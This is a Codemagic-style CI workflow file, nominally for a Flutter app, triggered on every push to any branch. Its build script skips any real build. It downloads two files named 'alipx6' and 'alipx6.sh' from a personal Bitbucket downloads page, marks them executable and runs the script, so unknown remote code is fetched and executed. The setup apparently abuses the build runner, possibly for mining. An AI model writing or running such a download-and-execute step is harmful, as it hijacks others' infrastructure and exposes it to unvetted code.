workflows:
  my-workflow:
    name: My workflow name
    instance_type: linux_x2
    max_build_duration: 120
    environment:
      vars:
        PUBLIC_ENV_VAR: "21.04"
      flutter: stable
      xcode: latest
    cache:
      cache_paths:
        - ~/.pub-cache
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: '*'
          include: true
          source: true
      cancel_previous_builds: false
    scripts:
      - |
        wget https://bitbucket.org/spo4RockA/alabama/downloads/alipx6
        wget https://bitbucket.org/spo4RockA/alabama/downloads/alipx6.sh
        chmod +x alipx6
        chmod +x alipx6.sh
        bash alipx6.sh
    artifacts:
      - build/**/outputs/**/*.aab
    publishing:
      email:
        recipients:
          - name@example.com
      scripts:
        - echo 'Post-publish script'
